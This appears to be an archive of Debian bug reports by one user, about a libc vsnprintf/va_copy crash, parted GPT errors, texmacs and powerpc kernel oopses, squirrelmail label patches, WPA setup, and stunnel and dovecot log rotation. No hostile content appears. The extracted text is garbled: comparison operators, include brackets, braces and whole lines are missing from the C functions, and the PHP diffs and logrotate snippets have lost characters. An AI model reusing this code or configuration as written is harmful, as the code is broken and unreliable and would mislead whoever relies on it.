int vfnprint(int fdout, int r, const char *fmt, va_list ap)
	int i;
	char *p;


/* NB: alloca may return shit, but no it _IS_ vsnprintf */


/* segfault inside this  */


	if(i0) {
		return 1-2*r;
	if(ir) {
		return i;
	return -i;

/* +Ve == bytes written -Ve == failure */

int vfprint(int fdout, const char *fmt, va_list ap)
	i=vfnprint(fdout, i, fmt, ap);
		i=vfnprint(fdout, 1-i, fmt, ap);
	return i;

int fprint(int fdout, const char *fmt, ...)
	va_list ap;
	int r;

	va_start(ap, fmt);
	r=vfprint(fdout, fmt, ap);
	return r;

Bug#609756: vsnprintf segfaults on second attempt with alloca

2011-01-12 Thread Andrew Buckeridge
Package: libc6
Version: 2.7-18lenny7

C99 only va_copy does help. This is a new one for me.
Does vfnprint destroy the callers ap?
Does this break C89 and C90?

Gcc did not require -std=c99 or -std=gnu99 to accept va_copy.

Assuming stdarg.h was something like
#define va_start(ap, last) (ap)=(va_list)((last)+sizeof(last))
#define va_arg(ap, type) ((ap)+=sizeof(type),(type)*((ap)-sizeof(type)))
would be wrong.

On Wed, 12 Jan 2011 10:18:41 +
Florian Weimer fwei...@bfk.de wrote:

 * Andrew Buckeridge:
  int vfprint(int fdout, const char *fmt, va_list ap)
  int i=NONSTDBUF;
  i=vfnprint(fdout, i, fmt, ap);
  i=vfnprint(fdout, 1-i, fmt, ap);
  return i;
 va_copy seems to be missing here.
 Florian Weimerfwei...@bfk.de
 BFK edv-consulting GmbH   http://www.bfk.de/
 Kriegsstraße 100  tel: +49-721-96201-1
 D-76133 Karlsruhe fax: +49-721-96201-99
fprint.c - unistdio fprint function - Andrew Buckeridge
#include stdio.h
#include stdarg.h
#include unistd.h
#include alloca.h
#include fprint.h
#include string.h
/* +Ve == bytes written -Ve == bytes required */

int vfnprint(int fdout, int r, const char *fmt, va_list ap)
	int i;
	char *p;


/* NB: alloca may return shit, but no it _IS_ vsnprintf */


/* segfault inside this  */


	if(i0) {
		return 1-2*r;
	if(ir) {
		return ((write(fdout,p,i))==i)?i:-1;
	return -i;

/* +Ve == bytes written -Ve == failure */

int vfprint(int fdout, const char *fmt, va_list ap)
	va_list aq;

	i=vfnprint(fdout, i, fmt, ap);
		i=vfnprint(fdout, 1-i, fmt, aq);
	return i;

int fprint(int fdout, const char *fmt, ...)
	va_list ap;
	int r;

	va_start(ap, fmt);
	r=vfprint(fdout, fmt, ap);
	return r;

Bug#606168: Parted complains about MBR modified by gptsync

2010-12-06 Thread Andrew Buckeridge
Package: parted
Version: 1.8.8.git.2008.03.24-11.1

disk0label attached is the first 40 blocks (20480 B) of GPT with MBR
modified by gptsync.

$ /sbin/parted -s disk0label print
Warning: Unable to open /home/andrewb/disk0label read-write (Permission
denied).  /home/andrewb/disk0label has been opened read-only. Warning:
Unable to open /home/andrewb/disk0label read-write (Permission
denied).  /home/andrewb/disk0label has been opened read-only. Error:
Can't have the end before the start! Error: Can't have overlapping
partitions. Error: Can't have overlapping partitions. Backtrace has 9
calls on stack: 9: /lib/libparted-1.8.so.10(ped_assert+0xb0) [0xff7ca60]
  8: /lib/libparted-1.8.so.10 [0xffc07a8]
  7: /lib/libparted-1.8.so.10(ped_disk_new+0xc4) [0xff86c44]
  6: /sbin/parted [0x100077f0]
  5: /sbin/parted(command_run+0x1c) [0x1000583c]
  4: /sbin/parted(non_interactive_mode+0xb4) [0x1000d994]
  3: /sbin/parted(main+0x80) [0x1000b910]
  2: /lib/libc.so.6 [0xfd49704]
  1: /lib/libc.so.6 [0xfd498c0]

You found a bug in GNU Parted! Here's what you have to do:

Don't panic! The bug has most likely not affected any of your data.
Help us to fix this bug by doing the following:

Check whether the bug has already been fixed by checking
the last version of GNU Parted that you can find at:


Please check this version prior to bug reporting.

If this has not been fixed yet or if you don't know how to check,
please visit the GNU Parted website:


for further information.

Your report should contain the version of this release (1.8.8)
along with the error message below, the output of

parted DEVICE unit co print unit s print

and the following history of commands you entered.
Also include any additional information about your setup you
consider important.

Assertion ((PedSector) PED_LE64_TO_CPU (gpt-AlternateLBA) =
disk-dev-length - 1) at ../../../libparted/labels/gpt.c:828 in
function gpt_read() failed.

Error: Can't have overlapping partitions.

The MBR itself.

$/sbin/sfdisk -d disk0label

WARNING: GPT (GUID Partition Table) detected on 'disk0label'! The util
sfdisk doesn't support GPT. Use GNU Parted.

# partition table of disk0label
unit: sectors

disk0label1 : start=1, size=   409639, Id=ee
disk0label2 : start=   409640, size=456713104, Id=af
disk0label3 : start=457384888, size=453190728, Id=83, bootable
disk0label4 : start=910575616, size= 32966656, Id=83

Description: Binary data

Bug#496355: Wrong severity tag to fix stable

2010-09-02 Thread Andrew Buckeridge
I believe the segfault bug is bad enough for a release-critical grave
classification as it results in data loss and limits usefulness of the

The current severity is important which is not enough to get the fixed
version into stable.

For new a package to be moved in to stable it needs to fix a release
critical bug. Release critical bugs are critical, grave and serious.

Is the segfaulting version unusable or mostly so?
If this is the case then the severity should be set to grave.

   makes the package in question unusable or mostly so, or causes data
   loss, or introduces a security hole allowing access to the accounts
   of users who use the package.
   a bug which has a major effect on the usability of a package,
   without rendering it completely unusable to everyone.

   * causes serious data loss
Loss of edit buffers or a single file may not be serious,
but significant file system damage probably is.
   * makes the package in question unusable or mostly so
   * causes data loss
Only usable if you don't close files.
If you do you will loose your buffers.

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#496355: Can build texmacs 1: in lenny.

2010-08-31 Thread Andrew Buckeridge
I installed texmacs and texmacs-common 1: from source in stable
and texmacs-extra-fonts binary from testing and I could close file
without sefault.

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#496355: close document closes application is grave

2010-08-30 Thread Andrew Buckeridge
Package: texmacs
Version: 1:

Can open help and Go to multiple documents, but as soon as I close any
via menu Close document C-x k it dies. This makes Help useless.
I would call this grave as it will segfault with any use.

It will need a severity of serious, grave or critical so that it can be
regarded as release critical to be fixed in stable.

Please update to appropriate severity and put better one in stable so
that package is usable there.

makes the package in question unusable or mostly so, or causes data
loss, or introduces a security hole allowing access to the accounts
of users who use the package.

Loosing your whole document is pretty serious data loss.

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#540601: Getting Oopses on a 32-bit powerpc Pegasos2

2010-07-21 Thread Andrew Buckeridge
Package: linux-image-2.6.32-5-powerpc
Version: 2.6.32-15

Running 2.6.32-15 since Tue, 20 Jul 2010 and system has stayed up
between reboot and fsck forced with:
0 3 * * *   /sbin/shutdown -t 15 -rF now

$ uname -r

 Jul 22 03:22:55 chrp -- MARK --
 Jul 22 03:42:55 chrp -- MARK --
 Jul 22 04:02:55 chrp -- MARK --
 Jul 22 04:22:55 chrp -- MARK --
 Jul 22 04:42:55 chrp -- MARK --
 Jul 22 05:02:55 chrp -- MARK --
 Jul 22 05:22:55 chrp -- MARK --
 Jul 22 05:42:55 chrp -- MARK --
 Jul 22 06:02:55 chrp -- MARK --
 Jul 22 06:22:55 chrp -- MARK --
 Jul 22 06:42:55 chrp -- MARK --
 Jul 22 07:02:56 chrp -- MARK --
 Jul 22 07:22:56 chrp -- MARK --
 Jul 22 07:42:56 chrp -- MARK --
 Jul 22 08:02:56 chrp -- MARK --
 Jul 22 08:19:34 chrp kernel: [19081.365029] [drm] Initialized drm 1.1.0 
 Jul 22 08:19:35 chrp kernel: [19081.634847] [drm] radeon defaulting to 
 userspace modesetting.
 Jul 22 08:19:35 chrp kernel: [19081.636199] [drm] Initialized radeon 1.32.0 
 20080528 for 0001:01:08.0 on minor 0
 Jul 22 08:19:36 chrp kernel: [19083.111653] [drm] Setting GART location based 
 on new memory map
 Jul 22 08:19:36 chrp kernel: [19083.160078] [drm] Loading R200 Microcode
 Jul 22 08:19:36 chrp kernel: [19083.163411] platform radeon_cp.0: firmware: 
 requesting radeon/R200_cp.bin
 Jul 22 08:19:36 chrp kernel: [19083.289656] [drm] writeback test succeeded in 
 1 usecs

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#540601: Getting Oopses on a 32-bit powerpc Pegasos2

2010-07-20 Thread Andrew Buckeridge
Package: linux-image-2.6.32-bpo.5-powerpc
Version: 2.6.32-15~bpo50+1

I am running 2.6.32 now from backports and system has stayed up.

$ uname -r


 # wget 

 # wget 

 # dpkg -i linux-image-2.6.32-5-powerpc_2.6.32-15_powerpc.deb 

Seems to install in stable from squeeze so will test.

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#579632: Netbook enhancements

2010-04-29 Thread Andrew Buckeridge
Package: squirrelmail
Version: 2:1.4.15-4+lenny2
Severity: whishlist

The options in squirrelmail to edit are all over the shop and a waste
of SVGA space. When overseas I noticed that these would not fit on
netbook display when a reasonable font size was used.

The inconsistency issue is a bit like #421152 which is also a wishlist
item for upstream.

These are not skinable so I will need it changed if it is not to revert
on every update.

I hacked up /usr/share/squirrelmail/src/read_body.php

The logic might be a mess, but this just tidies up display.

Folder  Edit option textNew text
SentEdit Message as New Edit
Drafts  Resume DraftEdit
INBOX   Forward Edit (only threading)
INBOX   Forward as Attachment   Forward (any other way?)

 /usr/share/squirrelmail/po/squirrelmail.pot:733:msgid Edit Message as New
 /usr/share/squirrelmail/src/read_body.php:567:$comp_alt_string = 
 _(Edit Message as New);
Change to Edit.

 /usr/share/squirrelmail/po/squirrelmail.pot:730:msgid Resume Draft
 /usr/share/squirrelmail/src/read_body.php:564:$comp_alt_string = 
 _(Resume Draft);
Change to Edit.

 /usr/share/squirrelmail/po/squirrelmail.pot:739:msgid Forward
 /usr/share/squirrelmail/po/squirrelmail.pot:1584:msgid Prepend Signature 
 before Reply/Forward Text
 /usr/share/squirrelmail/src/read_body.php:641:$s .= 
 makeComposeLink($comp_action_uri, _(Forward));
Change to Edit.

 /usr/share/squirrelmail/po/squirrelmail.pot:742:msgid Forward as Attachment
 /usr/share/squirrelmail/po/squirrelmail.pot:1557:msgid Enable Forward as 
 /usr/share/squirrelmail/src/read_body.php:646:$s .= 
 makeComposeLink($comp_action_uri, _(Forward as Attachment));
Change to Forward.

I have changed 4 lines in /usr/share/squirrelmail/src/read_body.php

 --- read_body.php.ori   2009-05-19 22:43:01.0 +0800
 +++ read_body.php   2010-04-29 18:25:08.0 +0800
 @@ -561,10 +561,10 @@
  if (($mailbox == $draft_folder)  ($save_as_draft)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=draft';
 -$comp_alt_string = _(Resume Draft);
 +$comp_alt_string = _(Edit);
  } else if (handleAsSent($mailbox)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=edit_as_new';
 -$comp_alt_string = _(Edit Message as New);
 +$comp_alt_string = _(Edit);
  if (isset($comp_alt_uri)) {
  $s .= $topbar_delimiter;
 @@ -638,12 +638,12 @@
  $s .= '/small/td' . \n .
html_tag( 'td', '', 'right', '', 'width=33% nowrap' ) . 
  $comp_action_uri = $comp_uri . 'amp;smaction=forward';
 -$s .= makeComposeLink($comp_action_uri, _(Forward));
 +$s .= makeComposeLink($comp_action_uri, _(Edit));
  if ($enable_forward_as_attachment) {
  $comp_action_uri = $comp_uri . 'amp;smaction=forward_as_attachment';
  $s .= $topbar_delimiter;
 -$s .= makeComposeLink($comp_action_uri, _(Forward as Attachment));
 +$s .= makeComposeLink($comp_action_uri, _(Forward));
  $comp_action_uri = $comp_uri . 'amp;smaction=reply';

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#579632: Drafts folder

2010-04-29 Thread Andrew Buckeridge
Package: squirrelmail
Version: 2:1.4.15-4+lenny2
Severity: whishlist

My change resulted in two Edit options for Drafts folder.
They were very similar. Now I have:

Folder  Edit option textNew text
SentEdit Message as New Edit
Drafts  Resume DraftResume
INBOX   Forward Edit (only threading)
INBOX   Forward as Attachment   Forward (any other way?)

Forwarding inline is useless for any forensics, but a way preserving
just threading in re-purposed email sometimes is useful. Now a bit

 --- read_body.php.ori   2009-05-19 22:43:01.0 +0800
 +++ read_body.php   2010-04-29 19:09:52.0 +0800
 @@ -561,10 +561,10 @@
  if (($mailbox == $draft_folder)  ($save_as_draft)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=draft';
 -$comp_alt_string = _(Resume Draft);
 +$comp_alt_string = _(Resume);
  } else if (handleAsSent($mailbox)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=edit_as_new';
 -$comp_alt_string = _(Edit Message as New);
 +$comp_alt_string = _(Edit);
  if (isset($comp_alt_uri)) {
  $s .= $topbar_delimiter;
 @@ -638,12 +638,12 @@
  $s .= '/small/td' . \n .
html_tag( 'td', '', 'right', '', 'width=33% nowrap' ) . 
  $comp_action_uri = $comp_uri . 'amp;smaction=forward';
 -$s .= makeComposeLink($comp_action_uri, _(Forward));
 +$s .= makeComposeLink($comp_action_uri, _(Edit));
  if ($enable_forward_as_attachment) {
  $comp_action_uri = $comp_uri . 'amp;smaction=forward_as_attachment';
  $s .= $topbar_delimiter;
 -$s .= makeComposeLink($comp_action_uri, _(Forward as Attachment));
 +$s .= makeComposeLink($comp_action_uri, _(Forward));
  $comp_action_uri = $comp_uri . 'amp;smaction=reply';

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#579639: Netbook enhancements

2010-04-29 Thread Andrew Buckeridge
Package: squirrelmail
Version: 2:1.4.15-4+lenny2
Severity: wishlist

The options in squirrelmail to edit are all over the shop and a waste
of SVGA space. When overseas I noticed that these would not fit on
netbook display when a reasonable font size was used.

The inconsistency issue is a bit like #421152 which is also a wishlist
item for upstream.

These are not skinable so I will need it changed if it is not to revert
on every update.

I hacked up /usr/share/squirrelmail/src/read_body.php

The logic might be a mess, but this just tidies up display.

Folder  Edit option textNew text
SentEdit Message as New Edit
Drafts  Resume DraftEdit
INBOX   Forward Edit (only threading)
INBOX   Forward as Attachment   Forward (any other way?)

 /usr/share/squirrelmail/po/squirrelmail.pot:733:msgid Edit Message as New
 /usr/share/squirrelmail/src/read_body.php:567:$comp_alt_string = 
 _(Edit Message as New);
Change to Edit.

 /usr/share/squirrelmail/po/squirrelmail.pot:730:msgid Resume Draft
 /usr/share/squirrelmail/src/read_body.php:564:$comp_alt_string = 
 _(Resume Draft);
Change to Edit.

 /usr/share/squirrelmail/po/squirrelmail.pot:739:msgid Forward
 /usr/share/squirrelmail/po/squirrelmail.pot:1584:msgid Prepend Signature 
 before Reply/Forward Text
 /usr/share/squirrelmail/src/read_body.php:641:$s .= 
 makeComposeLink($comp_action_uri, _(Forward));
Change to Edit.

 /usr/share/squirrelmail/po/squirrelmail.pot:742:msgid Forward as Attachment
 /usr/share/squirrelmail/po/squirrelmail.pot:1557:msgid Enable Forward as 
 /usr/share/squirrelmail/src/read_body.php:646:$s .= 
 makeComposeLink($comp_action_uri, _(Forward as Attachment));
Change to Forward.

I have changed 4 lines in /usr/share/squirrelmail/src/read_body.php

 --- read_body.php.ori   2009-05-19 22:43:01.0 +0800
 +++ read_body.php   2010-04-29 18:25:08.0 +0800
 @@ -561,10 +561,10 @@
  if (($mailbox == $draft_folder)  ($save_as_draft)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=draft';
 -$comp_alt_string = _(Resume Draft);
 +$comp_alt_string = _(Edit);
  } else if (handleAsSent($mailbox)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=edit_as_new';
 -$comp_alt_string = _(Edit Message as New);
 +$comp_alt_string = _(Edit);
  if (isset($comp_alt_uri)) {
  $s .= $topbar_delimiter;
 @@ -638,12 +638,12 @@
  $s .= '/small/td' . \n .
html_tag( 'td', '', 'right', '', 'width=33% nowrap' ) . 
  $comp_action_uri = $comp_uri . 'amp;smaction=forward';
 -$s .= makeComposeLink($comp_action_uri, _(Forward));
 +$s .= makeComposeLink($comp_action_uri, _(Edit));
  if ($enable_forward_as_attachment) {
  $comp_action_uri = $comp_uri . 'amp;smaction=forward_as_attachment';
  $s .= $topbar_delimiter;
 -$s .= makeComposeLink($comp_action_uri, _(Forward as Attachment));
 +$s .= makeComposeLink($comp_action_uri, _(Forward));
  $comp_action_uri = $comp_uri . 'amp;smaction=reply';

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#579639: Drafts folder

2010-04-29 Thread Andrew Buckeridge
Package: squirrelmail
Version: 2:1.4.15-4+lenny2
Severity: wishlist

My change resulted in two Edit options for Drafts folder.
They were very similar. Now I have:

Folder  Edit option textNew text
SentEdit Message as New Edit
Drafts  Resume DraftResume
INBOX   Forward Edit (only threading)
INBOX   Forward as Attachment   Forward (any other way?)

Forwarding inline is useless for any forensics, but a way preserving
just threading in re-purposed email sometimes is useful. Now a bit

 --- read_body.php.ori   2009-05-19 22:43:01.0 +0800
 +++ read_body.php   2010-04-29 19:09:52.0 +0800
 @@ -561,10 +561,10 @@
  if (($mailbox == $draft_folder)  ($save_as_draft)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=draft';
 -$comp_alt_string = _(Resume Draft);
 +$comp_alt_string = _(Resume);
  } else if (handleAsSent($mailbox)) {
  $comp_alt_uri = $comp_uri . 'amp;smaction=edit_as_new';
 -$comp_alt_string = _(Edit Message as New);
 +$comp_alt_string = _(Edit);
  if (isset($comp_alt_uri)) {
  $s .= $topbar_delimiter;
 @@ -638,12 +638,12 @@
  $s .= '/small/td' . \n .
html_tag( 'td', '', 'right', '', 'width=33% nowrap' ) . 
  $comp_action_uri = $comp_uri . 'amp;smaction=forward';
 -$s .= makeComposeLink($comp_action_uri, _(Forward));
 +$s .= makeComposeLink($comp_action_uri, _(Edit));
  if ($enable_forward_as_attachment) {
  $comp_action_uri = $comp_uri . 'amp;smaction=forward_as_attachment';
  $s .= $topbar_delimiter;
 -$s .= makeComposeLink($comp_action_uri, _(Forward as Attachment));
 +$s .= makeComposeLink($comp_action_uri, _(Forward));
  $comp_action_uri = $comp_uri . 'amp;smaction=reply';

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#579639: sourceforge.net SquirrelMail ID: 2994524

2010-04-29 Thread Andrew Buckeridge
Package: squirrelmail
Version: 2:1.4.15-4+lenny2
Severity: wishlist

I have posted similar in SourceForge

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#577827: Exception include/linux/dcache.h:324

2010-04-14 Thread Andrew Buckeridge
Package: linux-image-2.6.26-2-powerpc
Version: 2.6.26-21lenny4

 [ 8786.557407] Linux agpgart interface v0.103
 [ 8786.617325] [drm] Initialized drm 1.1.0 20060810
 [ 8786.645700] [drm] Initialized radeon 1.29.0 20080528 on minor 0
 [ 8788.031407] [drm] Setting GART location based on new memory map
 [ 8788.031734] [drm] Loading R200 Microcode
 [ 8788.031858] [drm] writeback test succeeded in 1 usecs
 [ 9298.922086] [ cut here ]
 [ 9298.922124] kernel BUG at include/linux/dcache.h:324!
 [ 9298.922141] Oops: Exception in kernel mode, sig: 5 [#1]
 [ 9298.922146] CHRP
 [ 9298.922149] Modules linked in: radeon drm agpgart rfcomm l2cap bluetooth 
 lp xt_tcpudp iptable_filter ip_tables x_tables cpufreq_userspace 
 cpufreq_conservative cpufreq_ondemand cpufreq_stats cpufreq_powersave ipv6 
 nls_utf8 isofs zlib_inflate loop nls_cp437 msdos fat nls_base fuse snd_i2c 
 binfmt_misc i2c_dev softdog visor usbserial firmware_class oprofile 
 snd_pcm_oss snd_mixer_oss sr_mod serio_raw psmouse i8042 atkbd serio libps2 
 snd_via82xx gameport snd_mpu401_uart snd_seq_midi snd_seq_midi_event 
 snd_rawmidi snd_via82xx_modem snd_ac97_codec ac97_bus snd_pcm snd_seq 
 snd_timer snd_seq_device snd vt8231 parport_pc parport snd_page_alloc usblp 
 soundcore i2c_viapro via_ircc irda crc_ccitt evdev ext3 jbd mbcache 
 ide_cd_mod cdrom ide_disk ide_pci_generic via82cxxx ata_generic mv643xx_eth 
 libata via_rhine uhci_hcd scsi_mod ehci_hcd ohci1394 ieee1394 i2c_powermac 
 [last unloaded: scsi_wait_scan]
 [ 9298.922338] NIP: c00a8f4c LR: c00ac068 CTR: e212faa0
 [ 9298.922350] REGS: c5cb3ce0 TRAP: 0700   Not tainted  (2.6.26-2-powerpc)
 [ 9298.922355] MSR: 00029032 EE,ME,IR,DR  CR: 28000228  XER: 
 [ 9298.922370] TASK = c5e02ef0[17217] 'seamonkey-bin' THREAD: c5cb2000
 [ 9298.922375] GPR00: 0001 c5cb3d90 c5e02ef0 ca57e3b4 c5cb3e68 3b9aca00 
 c03dd5e0 c03e 
 [ 9298.922388] GPR08: c5e15d24 df80df20 c03e 04b4  1004ed4c 
 bfffef38 00010011 
 [ 9298.922401] GPR16: 0ffcad7c bfffef6c bfffef54 bfffef48 bfffef00  
 [ 9298.922414] GPR24: 0001   c5e250b4  c5e15c4c 
 c5cb3da0 c5cb3e68 
 [ 9298.922427] NIP [c00a8f4c] path_get+0x3c/0x54
 [ 9298.922456] LR [c00ac068] __link_path_walk+0xa94/0xd38
 [ 9298.922469] Call Trace:
 [ 9298.922475] [c5cb3d90] [c00abee8] __link_path_walk+0x914/0xd38 (unreliable)
 [ 9298.922486] [c5cb3de0] [c00ac354] path_walk+0x48/0xa8
 [ 9298.922494] [c5cb3e10] [c00ac6b8] do_path_lookup+0x130/0x1c0
 [ 9298.922504] [c5cb3e40] [c00ad0a4] __user_walk_fd+0x4c/0x70
 [ 9298.922514] [c5cb3e60] [c00a5130] vfs_stat_fd+0x24/0x60
 [ 9298.922523] [c5cb3ed0] [c00a52c4] sys_stat64+0x20/0x50
 [ 9298.922532] [c5cb3f40] [c0013810] ret_from_syscall+0x0/0x40
 [ 9298.922544] --- Exception: c01 at 0xee3b6d0
 [ 9298.922585] LR = 0xfd91ff0
 [ 9298.922589] Instruction dump:
 [ 9298.922596] 419e0014 7d600028 316b0001 7d60012d 40a2fff4 80030004 2f80 
 [ 9298.922608] 4d9e0020 8003 7c34 5400d97e 0f00 7c001828 
 3001 7c00192d 
 [ 9298.922626] ---[ end trace ce061d51c241df43 ]---

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Bug#577827: Some noise from userspace too

2010-04-14 Thread Andrew Buckeridge
Package: linux-image-2.6.26-2-powerpc
Version: 2.6.26-21lenny4

After Oops seamonkey threw
 chrp kernel: [ 9298.922086] [ cut here ]
 /usr/bin/seamonkey: line 322: 17217 Trace/breakpoint trap   
 DISPLAY=${CMDLINE_DISPLAY} ${MOZ_PROGRAM} -remote 'ping()'  /dev/null 21

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Bug#576486: WPA does not work on Apple airport

2010-04-04 Thread Andrew Buckeridge
Package: wpasupplicant
Version: 0.6.4-3

I can not get Apple airport to use WPA via /etc/network/interfaces
This may be related to

Modules hermes, orinoco and airport are from
/proc/sys/kernel/osrelease is 2.6.26-2-powerpc

 r...@bug:/etc/network# ifup eth2
 ioctl[SIOCSIWENCODEEXT]: Operation not supported
 ioctl[SIOCSIWENCODE]: Invalid argument
 ioctl[SIOCSIWENCODEEXT]: Operation not supported
 ioctl[SIOCSIWENCODE]: Invalid argument
 ioctl[SIOCSIWENCODEEXT]: Operation not supported
 ioctl[SIOCSIWENCODE]: Invalid argument
 ioctl[SIOCSIWENCODEEXT]: Operation not supported
 ioctl[SIOCSIWENCODE]: Invalid argument
 Internet Systems Consortium DHCP Client V3.1.1
 Copyright 2004-2008 Internet Systems Consortium.
 All rights reserved.
 For info, please visit http://www.isc.org/sw/dhcp/
DHCP went on to fail.

The modules are pulled to save power on laptop.
This worked with 128-bit WEP w/o wpasupplicant.
The preshared key is in plaintext.
It is not hex.

 iface eth2 inet dhcp
  wpa-driver wext
  wpa-ssid thessid
  wpa-psk thesecret
  wpa-key-mgmt WPA-PSK
  pre-up \
  post-down rmmod airport orinoco hermes

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Bug#532750: linux-image-2.6.26-2-powerpc too

2009-10-20 Thread Andrew Buckeridge
Package: linux-image-2.6.26-2-powerpc
Version: 2.6.26-19

On Mon, 19 Oct 2009 01:03:42 +0100
Ben Hutchings xxx wrote:

 On Fri, 2009-10-02 at 22:58 +0800, Andrew Buckeridge wrote:
  Package: linux-image-2.6.26-2-powerpc
  Version: 2.6.26-19
  Get kernel BUG at mm/slab.c:3008! with linux-image-2.6.26-2-powerpc too.
 Is this triggered by NFS activity?  If not, it's probably due to a
 different bug and you should make a separate bug report.

Good question, but NO.

No exports or lock daemons running.

Could it be any activity that uses kernel space? Network, local ATA
disc or X11? Machine is not running NFS. Do not know what triggered it.

This is a 32-bit machine running an MTA (exim4-daemon-heavy) with
scanners. Often the user space Microsoft virus scanner (clamav-daemon)
refuses connections. A segfault on pointer deref is always nicer than
a kernel panic.

It is a small _one_ way 32-bit machine: -

andr...@chrp:~$ cat /proc/meminfo 
MemTotal:   514480 kB
MemFree: 40380 kB
Buffers: 18340 kB
Cached:  89300 kB
SwapCached: 16 kB
Active: 320060 kB
Inactive:49332 kB
HighTotal:   0 kB
HighFree:0 kB
LowTotal:   514480 kB
LowFree: 40380 kB
SwapTotal: 1044216 kB
SwapFree:  1043444 kB
Dirty:  80 kB
Writeback:   0 kB
AnonPages:  261756 kB
Mapped:  54388 kB
Slab:86820 kB
SReclaimable:78356 kB
SUnreclaim:   8464 kB
PageTables:   2492 kB
NFS_Unstable:0 kB
Bounce:  0 kB
WritebackTmp:0 kB
CommitLimit:   1301456 kB
Committed_AS:   445160 kB
VmallocTotal:   499580 kB
VmallocUsed: 29080 kB
VmallocChunk:   470256 kB

andr...@chrp:~$ cat /proc/cpuinfo  
processor   : 0
cpu : 7447/7457, altivec supported
clock   : 999.90MHz
revision: 0.1 (pvr 8002 0101)
bogomips: 66.56
platform: CHRP
model   : Pegasos2
machine : CHRP Pegasos2

Also running MTA on 2.6.26-2-amd64 on amd64 with 4 GiB physical. Less
probs with that machine and it does a lot of email. Running linux-image
from the same linux-source. The 32-bit powerpc is just my home email.

I.e. linux-image-2.6.26-2-amd64_2.6.26-19 is running okay with that
workload. This has NFS homes for Maildir delivery to 500 users on
Solaris/ZFS. It is headless and has console redirected to serial in
BIOS. (Vintage Sun X2100 without M2 still in service running upgraded
original Debian i386.)
 Ben Hutchings
 It is impossible to make anything foolproof because fools are so ingenious.

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Bug#535924: can not bind after restart

2009-07-06 Thread Andrew Buckeridge
Package: stunnel4
Version: 3:4.22-2

If stunnel4 is restarted when clients are connected it can not re-bind.
Eventually all clients will disconnect and no be able to re-connect.
If stunnel4 were then to retry binding the address it could then succed.

The need for restarting could be addressed properly in bugs #323171,

These are old log entries. I have seen the problem more recently.
Can't test during the day on live system.
 2008.05.02 21:29:19 LOG3[13866:4157220544]: Error binding imaps to
 2008.05.02 21:29:19 LOG3[13866:4157220544]: bind: Address already in use (98)

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Bug#535926: stunnel wrapper pid file diff to old stunnel pkg

2009-07-06 Thread Andrew Buckeridge
Package: stunnel4
Version: 3:4.22-2
Severity: wishlist

The stunnel wrapper does not set default -P option.
This is different behaviour to the old stunnel that it replaces.

In my local scripts I had to add the -P option to my OPTIONS: -




echo -n Restarting $NAME
start-stop-daemon --stop --quiet --pidfile $PIDFILE
sleep 2
start-stop-daemon --start --quiet --pidfile $PIDFILE \
--exec $DAEMON -- $OPTIONS
echo .


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Bug#535915: copytruncate avoids need for restart

2009-07-06 Thread Andrew Buckeridge
Package: stunnel4
Version: 3:4.22-2

Using copytruncate is much better than postrotate ... endscript.
I am using root:adm rather than stunnel4:stunnel4 (bug #529481) as
using stunnel wrapper. I only keep 90 days or 13 weeks worth of logs on

/var/log/stunnel4/*.log {
rotate 13
create 640 root adm

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Bug#535915: logrotate postrotate has error if stunnel not running

2009-07-05 Thread Andrew Buckeridge
Package: stunnel4
Version: 3:4.22-2

error: error running shared postrotate script
for /var/log/stunnel4/*.log run-parts: /etc/cron.daily/logrotate exited
with return code 1

/var/log/stunnel4/*.log {
 rotate 356
 create 640 root adm
   /etc/init.d/stunnel4 restart  /dev/null

   [ -r /var/run/stunnel4.pid ]  \
   [ -r /proc/$(cat /var/run/stunnel4.pid) ]  \
   /etc/init.d/stunnel4 restart  /dev/null

This script fragment may make error go away, but won't fix binding
issue I will report in other bug if not already reported. My reason for
using the stunnel wrapper is that stunnel4 fails to bind after restart.
This could be addressed properly in bugs #323171, #323171.

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Bug#535027: dovecot-common does not rotate logs

2009-06-28 Thread Andrew Buckeridge
Package: dovecot-common
Version: 1:1.0.15-2.3
Severity: whishlist

A script to rotate the logs was not installed with the package.

After rotating logs I issue a SIGUSR1 to re-open logfile.

May have something to do with #532918

SIGHUP should re-exec master and re-read config too.

SIGUSR1 re-opens log according to URL below.

In my /etc/logrotate.d/dovecot-local I have put: - 
# http://wiki.dovecot.org/Logging - dovecot SIGUSR1: Re-opens the log files.
/var/log/dovecot/logfile /var/log/dovecot/messages {
  rotate 90
  create 640 root adm
if [ -r /var/run/dovecot/master.pid ]; then \
  kill -s USR1 $(cat /var/run/dovecot/master.pid); \

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Bug#342628: openoffice.org-common /usr/bin/ooffice

2009-05-27 Thread Andrew Buckeridge
Package: openoffice.org-common
Version: 1:2.4.1+dfsg-1

openoffice.org-gtk does not fix the resize issue in twm.

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Bug#342628: Can't resize window under twm or xfwm4 without openoffice.org-gtk

